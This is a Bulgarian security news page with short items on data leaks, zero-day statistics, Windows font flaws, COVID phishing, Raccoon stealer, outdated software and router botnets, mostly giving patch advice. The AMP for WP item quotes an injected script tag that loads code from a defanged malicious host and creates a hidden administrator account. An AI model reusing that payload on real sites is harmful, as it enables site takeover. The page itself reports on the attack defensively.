Уязвимости

  • Над 6.7 млн. записа лични данни са източени от онлайн търговеца Answear.com

    Полският търговец на дрехи BrandBQ е станал жертва на кибератака, довела до източването на над 1 млрд. записа от базите данни на организацията.

    В 6.7 млн. от източените записи е имало Personally Identifiable Information (PII или данни, с които може да се идентифицира физическо лице). Тя включва име, e-mail, адрес, рожденна дата, телефонен номер, пол и история за търсенията и покупки на клиентите на магазините на компанията.

    BrandBQ има онлайн и физически магазини в Източна Европа – България, Полша, Румъния, Унгария, Словакия, Украйна и Чехия. Сред свързаните с компанията марки са WearMedicine.com и Answear.com (който е засегнат от пробива).

    Като причина за теча се посочват неправилно конфигуриран cloud сървър. За нередностите първи са научили и взели действия екип от киберспециалисти от vpnMentor, които веднага са предприели стъпки към уведомяване на търговеца.

    Освен личните данни на частните клиенти, в базата данни на сървъра е имало и около 50 хил. записа на локални фирми, имащи договорни отношения с BrandBQ. Тези записи са съдържали информация като ЕИК, начин на плащане, цени на поръчки и получатели и адреси на техни онлайн клиенти.

    Всички тези открити незащитени записи са цяла златна мина за хакери и киберизмамници. Те могат да я използват не само да изнудват полският бранд, но и да последват фишинг атаки към техните клиенти или да извършват различни престъпления с крадените самоличности. Сред другите опции са злоупотреба с данни за доставчици, изнудване и потенциална загуба на репутация.

    Самата конфигурация на клауд сървъра от своя страна, може да даде нужната информация как са били настройвани ИТ ресурсите в BrandBQ и къде могат да търсят бъдещи грешки и пролуки за достъп.

    Конкурентите на модния бранд също биха могли да се възползват за да откупят информацията и опитат да откраднат повече клиенти с атрактивни цени или условия. Не на последно място, тъй като компанията е базирана в Европа, попада под регулаторните мерки и закони спрямо GDPR. Това е предпоставка за възможно огромна глоба и съдебни искове срещу BrandBQ.

    Какви са препоръките на специалистите от vpnMentor – за да се предпазим от подобни течове и загуба на ценна информация от база данни, можем да направим следните базови стъпки –

    • Да защитим работещите сървъри
    • Да се въведат правилни access list-и
    • Никога да не оставяме сървър/система която да не изисква автентикация и да е видима в интернет
    • Да не събираме чувствителна персонални данни, освен ако наистина не е необходимо. В този случай е препоръчително да бъдат криптирани и защитени
  • Google засече 11 експлоатирани zero-day уязвимости за първата половина на 2020 г. Ето кои са те

    Общо 11 експлоатирани zero-day уязвимости са били открити и анализирани от екипа за сигурност на Google – Project Zero през първата половина на 2020 г.

    0-day уязвимости през първата половина на 2020 г.

    1. Firefox (CVE-2019-17026) – Използва се предимно в комбинация с друга уязвимост – CVE-2020-0674 и най-вече за таргетирани атаки. Закърпена във Firefox версия 72.0.1.Твърди се, че е от арсенала на хакерската група Dark Hotel.

    2. Internet Explorer (CVE-2020-0674) – Тази, както и гореописаната Firefox 0-day уязвимост, е била използвана от държавно спонсорирана хакерска група (nation-state hacking group), известна като DarkHotel, за която се смята, че работи извън Корейския полуостров (не е ясно дали от Северна или Южна Корея). Двете уязвимости са били използвани за шпиониране на цели, разположени в Китай и Япония. Поради тази причина са открити от Qihoo 360 (китайски производител на антивирусни програми) и JPCERT (японският Център за действие при инциденти в информационната сигурност). Жертвите на тази кампания са били пренасочвани към уебсайт, който хоства експлоатиращ код  (exploit kit), насочен към 0-day уязвимостта в Firefox или IE, след което инфектира машините с троянски кон Gh0st, осигурявайки отдалечен достъп и контрол на нападателите върху компютрите на жертвите. Уязвимостта  е закърпена през февруари тази година като част от редовното закърпване на уязвимости от страна на  Microsoft, което се провежда всеки втори вторник на месеца – Patch Tuesday.

    3. Chrome (CVE-2020-6418) – Експлоатирането на тази 0-day уязвимост е било засечено от екипа на Google за анализ на кибератаки и заплахи (Goolge TAG), но не са публикувани подробности къде и кога. Закърпена в Chrome версия 80.0.3987.122.

    4 и 5. Trend Micro OfficeScan (CVE-2020-8467 и CVE-2020-8468) – Двете 0-day уязвимости са в приложение на Trend Micro – OfficeScan XG. Твърди се, че са открити от екипа на компанията случайно, при разследването на друга узявимост, използвана за хакването на Mitsubishi Electric. Запушени са малко след откриването им.

    6 и 7. Firefox (CVE-2020-6819 and CVE-2020-6820) – Подробности за атаките, при които са използвани тези две 0-day уязвимости във Firefox, все още не са публикувани. Въпреки това специалистите по информационна сигурност предполагат, че те може да са част от събития, свързани с по-голяма експлоатационна верига. Запушени са във Firefox версия 74.0.1.

    8, 9 и 10. Три уязвимости в продукти на Microsoft, открити и репортнати от Google TAG. Все още не е ясно при какви атаки са използвани. Това са CVE-2020-0938, CVE-2020-1020 и CVE-2020-1027, които са закърпени в априлското издание на Microsoft Patch Tuesday.

    11. Sophos XG Firewall (CVE 2020-12271) – Уязвимост в операционната система SFOS позволява изпълнение на зловреден код върху хардуерните и виртуални устройства Sophos XG. Потенциално засегнати са всички устройства с достъпен от интернет административен портал (HTTPS услуга) и/или потребителски портал (User Portal).

    SophosLabs публикуваха резултатите от проведеното разследване относно тази атака (Asnarök). Статията включва пълна техническа информация, включително и Indicators of Compromise (IoC). Уязвимостта е закърпена във фърмуер версия SFOS 17.5 MR12.

    За любителите на статистиката – екипът на Google Project Zero е публикувал

    таблица, в която са поместени всички открити експлойти на уязвимости от 2014 г. насам.

    0-day уязвимости през цялата 2019 г.

    • А за любителите на историята: нека да разгледаме анализа на Google за откритите през миналата година уязвимости – общо 20 на брой, 11 от които са свързани с продукти на Microsoft.
    • Две компании са открили половината от засечените 0-day уязвимости през 2019г. (Google са открили 7 и Kaspersky са открили 4).
    • Не е засечено активно експлоатиране на 0-day уязвимости в Linux, Safari или macOS от 2014г., когато Google започна да води подобна статистика.
    • За първи път през 2019г. е открита 0-day уязвимост в Android.
    • Не всички 0-day уязвимости засягат последните налични (актуални) версии на ОС/софтуер.
    • От Google подозират, че някои софтуерни вендори прикриват активно експлоатирани 0-day уязвимости, като ги определят като обикновени бъгове.
    • Според тях, причината за повечето открити 0-day уязвимости в продукти на Microsoft е, че има повече налични инструменти, които са специализирани именно в откриване на подобни бъгове.
    • Възможността за изолиране на приложения (app sandboxing) е една от причините, която спомага за трудното намиране на 0-day уязвимости в мобилните платформи.
    • 63% от 0-day уязвимостите, открити през 2019 г., се дължат на дефекти и слабости в кода, свързани с операциите в паметта (memory corruption bugs). Същият процент важи и за 2020 г. Това също е в унисон със статистическите данни, публикувани от Microsoft и Google през 2019 г., където се твърди, че 70% от всички уязвимости в продуктите на Microsoft и в Chome са т.нар. „memory safety issues”. През 2020г. Този процент е 63% от всички уязвимости.

    Заключение

    Поддържането на up-to-date софтуер/ОС няма да премахне вероятността да бъдете експлоатирани от 0-day уязвимост, но ще намали риска това да се случи. А в света на информационната сигурност именно „риск“ е ключовата дума или казано по друг начин – каква е вероятността това да се случи?

    Тъй като няма 100% сигурност, ние трябва да се стремим да държим този риск минимално нисък (или в допустими за нас граници).

  • Нови критични уязвимости в Windows, милиарди потребители са изложени на риск

    След SMBGhost, Microsoft призна за нови критични 0-day уязвимости за всички поддържани Windows операционни системи. За тях все още няма пачове, но по-долу в текста може да намерите заобиколни методи за временно разрешаване на проблема.
    И двата нови 0-day бъга са оценени със сериозност „Critical“. Те засягат Windows 10, 8.1 и Server 2008, 2012, 2016, и 2019 editions, както и Windows 7, за който Microsoft прекрати поддръжката на 14 януари 2020 г. Тези уязвимости позволяват Remote Code Execution (отдалечено изпълнение на зловреден код). За щастие публичен Proof of Concept все още не е достъпен и атаките използващи тази слабости са строго таргетирани и ограничени.

    Как работят уязвимостите? И двете уязвимости се коренят в Windows Adobe Type Manager Library, което всъщност е библиотека за обработка на шрифтове. Те се използва не само от външни приложения, но и от самия Windows Explorer за да покаже съдържанието (превю) на файловете в ‘Preview Pane’ или ‘Details Pane’ още преди потребителя да ги е отворил.

    Как се случва атаката? Без да изпадаме в технически подробности, ето как би била изглеждала атаката:

    1. Престъпникът (хакерът) подлъгва жертвата да отвори или просто да прегледа (Windows Preview pane) файл;
    2. Adobe Type Manager Library неправилно ще се опита да интерпретира специално изготвения „multi-master font – Adobe Type 1 PostScript format“;
    3. При успешна атака компютърът ще е изцяло подвластен на недоброжелателя.
      Preview & Details Panes
      Preview & Details Panes

    За щастие, според Microsoft, при Windows 10 недоброжелателят всъщност ще е затворен в AppContainer sandbox и ще има ограничени права на действие.

    Все още обаче не е известно дали тези уязвимости могат да бъдат атакувани директно отдалечено – например чрез специално изготвен сайт, който да превземе уеб браузера на жертвата.

    Microsoft знаят за проблема и работят върху ъпдейт, който ще поправи пропуските. Това се очаква да стане със следващия Patch Tuesday през идния месец април. Лошата новина е, че за уязвимостите все още няма пачове! За да ги елиминирате, приложете следните заобиколни методи – един от които е просто да спрете превюто на файловете в Windows Explorer.

    Прочетете тук как да се предпазите от тези 0-day уязвимости.
    В корпоративни мрежи препоръчваме на ИТ администраторите да приложат GPO, което да предпази крайните станции, докато Microsoft пуснат ъпдейти касаещи тези уязвимости.

    Това са поредните главоболия на софтуерния гигант, който намира под особено голямо напрежение в от началото на март. Освен вече пачнатият SMBGhost, Micorosft се принуди да удължи с 6 месеца поддръжката и издаването на ъпдейти касаещи сигурността за Windows 10 (build 1709), който се предполагаше, че трябва да е End of Life на 14 април 2020 г. Причината – пандемият от COVID-19.

    В рубриката Новините накратко подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • Фалшиви мейли за коронавирус, от които да се пазите

    Ставаме свидетели на безпрецедентно глобално събитие. Пандемията с COVID-19 (или както е популярното му название – коронавирус) стана причина за промяна в начина, по който живеем, работим и комуникираме помежду си. Стремежът на потребителите да са в крак с новините около разпространението на вируса не остана незабелязан от киберпрестъпниците.

    Събрахме за вас списък с най-популярните измами, свързани с COVID-19, на които попаднахме. Пазете се, защото те най-вероятно не са единствените.

    Фалшиви новини

    Обикновено идват от името на водещи световни институции – Световната Здравна Организация (СЗО), например, или копират водещи световни медии (в случая – Wall Street Journal – WSJ). Представени са под формата на съветници за предпазване от вируса или лекуването му.

    Фалшиви призиви за дарения

    Киберпрестъпниците не се колебаят да експлоатират добрината на хората и призовават към мними дарения – като включително копират легитимни кампании.

    Оферти за маски

    Маските за лице се превърнаха в силно търсена и почти невъзможна за намиране стока. Затова заваляха фалшиви оферти за тях. Не се подлъгвайте, пазарувайте само от легитимни магазини.

     

    Как да разпознаете измамите

    Водете се от правилото, че ако нещо е твърде хубаво, за да е истина, то най-вероятно не е. Подлагайте всичко на съмнение и следвайте правилата:

    • Не кликайте на съмнителни линкове и не сваляйте файлове – дори и привидно да идват от доверен източник. Потвърдете автентичността на мейла, преди да предприемете действие.
    • Игнорирайте комуникация, в която ви искат лични данни. Ако, все пак, имате съмнения, потвърдете автентичността и преди да продължите.
    • Внимавайте за мейли, които ви принуждават да предприемете спешни действия
    • Пазете се от фалшиви благотворителни организации или crowdfunding кампании
    • Използвайте проверено и ефективно  антивирусно решение (ако сте фирма и имате нужда от такова, възползвайте се от кампанията на CENTIO #Cybersecurity – #ЗаедноМожем. Безплатна защита за всички фирми в нужда)
    Прочетете повече по темата тук

    В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • Вирус под наем засяга над 60 приложения, сред които най-популярните браузъри

    Вирусът Raccoon впечатли света на киберсигурността с бизнес модела, който стои зад него. Софтуерът се предлага под наем срещу 200 USD на месец, срещу които „клиентите“ получават поддръжка, коригиране на бъгове и ъпдейти на функционалностите му.
    Това, отчасти, показва и защо той засяга над 60 различни приложения, сред които повече от 35 браузъра. Най-често вирусът стига до жертвите си посредством фишинг кампании с Microsoft Office документи. Сред функционалностите му са кражба на финансова информация, криптовалути, бисктвикти, история на сърфирането на данни, съхранявани във функциите за автоматично попълване на форми в браузърите.
    Сред основните цели на Raccoon са Google Chrome, Internet Explorer, Microsoft Edge и Firefox.

    Прочетете повече по темата тук

     

    В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

  • Над 50% от софтуера не се обновява и е уязвим на атаки

    Общо 55% от инсталираните софтуерни продукти по света не са обновени до най-новата версия, показват резултатите от проучване на компанията за информационна сигурност Avast.

    Обновяването на софтуера е необходимо за предпазване от уязвимости, които могат да бъдат експлоатирани. Когато софтуерът не се обновява, той е податлив на киберзаплахи и може да компрометира информационната сигурност на цялата фирма.

    Масово използвани в офиса продукти са в челната десетка

    Ако използвате стари версии на един софтуер, това не означава, че със сигурност ще станете жертва на атака. Вероятността това да се случи обаче се увеличава, тъй като редовното обновяване ви защитава срещу новооткрити проблеми със сигурността.

    Сред продуктите, които се обновяват най-рядко, е Skype, който е изключително популярен за провеждане на конферентни разговори в офиса. През 2017 г. в Skype беше открита критична уязвимост, която позволява на хакерите от разстояние да заредят зловреден код на устройството.

    В челната десетка попадат и медийният плейър VLC Media Player, както и четецът на PDF документи Foxit Reader.

    Проучването е направено на базата на 163 млн. устройства от цял свят.

    Windows 7 все още е най-популярна

    Най-популярната операционна система продължава да е Windows 7 – тя е инсталирана на 43% от компютрите по цял свят. Около 15% от инсталациите обаче са на най-ранната версия на Windows 7, която от 2013 г. не получава важни ъпдейти, свързани със сигурността.

    Поддръжката на Windows 7 ще приключи на 14 януари 2020 г. и собствениците на компютри имат по-малко от година, за да преминат към по-нова версия на операционната система.

    Критично остарял софтуер

    Ако не го направят, те рискуват да се сблъскат със същия проблем, с който се сблъскват в момента собствениците на компютри с WindowsXP. Тази операционна система не се поддържа от 2014 г. и за нея има над230 критични уязвимости с възможно най-високото ниво на риск за потребителите.

    Въпреки че делът на потребителите с Windows XP продължава да намалява, тази версия на Windows все още се ползва от 3% от тях.

    В допълнение към това около 15% от потребителите все още използват Microsoft Office Enterprise 2007, който не се поддържа от 2017 г. „Това означава, че Microsoft вече не публикува пачове за новопоявили се бъгове. През 2020 г. същото ще се случи и с Office 2010, въпреки че той е инсталиран само на 3% от компютрите.

  • Adobe пусна пач за критични уязвимости в Acrobat и Reader

    Adobe са публикували пач за две критични уязвимости в Acrobat и Reader, които могат да доведат до изпълнението на зловреден код чрез специално създаден за целта PDF файл.

    Уязвимостите позволяват на злонамерено лице да изпълни код на заразеното устройство без знанието на неговия собственик. Липсват подробности за механизма на действие, но според публикуваната информация това става чрез специално създаден за целта зловреден PDF файл. Отварянето на този файл може да осигури контрол над заразената машина.

    Adobe препоръчва на потребителите и системните администраторите да инсталират веднага обновленията.

    PDF файловете са един от основните преносители на малуер. Според F-Secure те са едно от петте файлови разширения (заедно с .DOC, .XLS, .ZIP и .7Z), които формират 8% от всички зловредни прикачени файлове в спам кампании.

    През май 2018 г. Microsoft и компанията за информационна сигурност ESET съобщиха за зловреден PDF файл, който съдържа експлойт за две непознати дотогава уязвимости: едната засягаща Acrobat и Reader, а другата засягаща Windows.

    Съвети за системни администратори и индивидуални потребители

    • Системните администратори следва да свалят инсталационните файлове от тук, както и да инсталират пачове чрез предпочитаната от тях методология: например AIP-GPO, SCUP/SCCM (Windows), или Apple Remote Desktop и SSH(macOS);
    • Индивидуалните потребители могат да обновят до последната версия на продукта с Help > Check for Updates;
    • Пълният инсталационен файл за Acrobat Reader може да се свали от тук;
  • Нова критична уязвимост в Adobe Flash Player, обновете го незабавно

    Adobe съобщава за новооткрита критична уязвимост в популярния Flash Player. Тя е налична във всички версии на продукта до 31.0.0.148 и позволява отдалечено изпълнение на зловреден код на устройството на жертвата.

    Уязвимостта е открита за пръв път на 13 ноември, но Adobe я обяви едва седмица по-късно. Това означава, че е възможно в този период уязвимостта да е била използвана, въпреки че от Adobe няма данни за злоупотреба. Теоретично уязвимостта може да бъде експлоатирана чрез зловреден Flash файл, намиращ се на създаден за целта сайт.

    Flash Player е известен със своите уязвимости, затова повечето интернет браузъри изискват изрично съгласие на потребителя, преди да зареждат Flash файлове. Уязвимостта на плейъра е една от причините, поради които популярността му намаля значително през последните години. В същото време възходът на алтернативни технологии като HTML5 и WebGL доведе до това, че Adobe реши да прекрати поддръжката на Flash Player към края на 2020 г.

    Според Джон Дън от Naked Security обаче дори и това няма да убие окончателно Flash Player: така, както Windows XP продължава да се използва 4 години, след като поддръжката на операционната система беше спряна. Това означава, че Flash Player ще продължи да е вектор на атака и потребителите ще трябва да внимават.

    „Историята ни учи да сме реалисти. Flash най-вероятно ще продължи да съществува като зомби технология. И то дълги години, след като Adobe си измие ръцете и спре да я поддържа“, коментира Дън.

    Съвети за потребители

    Уязвимостта е отстранена във версия 31.0.0.153 на Flash Player. Можете да свалите най-новата версия от Flash Player Download Center;

    Ако използвате Google Chrome или Microsoft Edge, обновете ги до най-новата версия;

  • Уязвимост в AMP For WP се експлоатира и позволява превземане на сайтове

    Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

    AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

    Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>

    Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

    „Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

    Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.

    Как да се предпазите

    Уязвимостта е отстранена във версия 0.9.97.20 на плъгина. Ако сайтът ви използва AMP For WP, обновете го до най-новата налична версия.

  • Петгодишна уязвимост експлоатира стотици хиляди рутери в бот мрежа

    Поне 100 хил. рутери са част от бот мрежа, която използва петгодишна уязвимост в утройства с чип на BroadCom. Анализатори на 360Netlab, които са открили бот мрежата, твърдят, че тя може да засегне около 400 хил. уязвими устройства, включително и такива в България.

    Активността на бот мрежата е засечена за пръв път през септември, но е продължила и през октомври. Тя е кръстена BCMUPnP_Hunter – от името на протокола UPnP. Анализът на 360Netlab показва, че в мрежата участват около 100 хил. инфектирани устройства, но броят на уязвимите рутери е в пъти по-голям.

    Уязвимите устройства са с банер Server: Custom/1.0 UPnP/1.0 Proc/Ver. Справка в Shodan показва, че към момента по света има над 405 хил. такива устройства. Локализирана справка само за България връща като резултат над 60 уязвими устройства.

    Бот мрежата експлоатира уязвимост в протокола UPnP (Universal Plug and Play) в чиповете на BroadCom, които се използват от редица производители на рутери. Уязвимостта е била открита през 2013 г. от компанията за информационна сигурност DefenseCode, но за нея беше съобщено едва през 2017 г., тъй като засяга огромно количество рутери – поне 15 млн. устройства. Тогава от DefenseCode изказаха предположението, че голяма част от тези рутери все още са уязвими, защото фърмуеърът им не е обновен.

    Според 360Netlab до момента са инфектирани над 100 различни вида рутери на популярни производители като Asus, D-link, Zyxel, Netgear и други. Веднъж инфектирани, те се превръщат в една голяма прокси мрежа. „Злонамерено лице може да изгради прокси мрежа и да я използва, за да изпраща спам, да генерира кликове и т.н.“, коментират от компанията.

    Ако мислите, че рутерът ви може да е инфектиран (списък на заразените модели има в блога на 360Netlab), универсалното решение е да обновите фърмуеъра на устройството.

     

Back to top button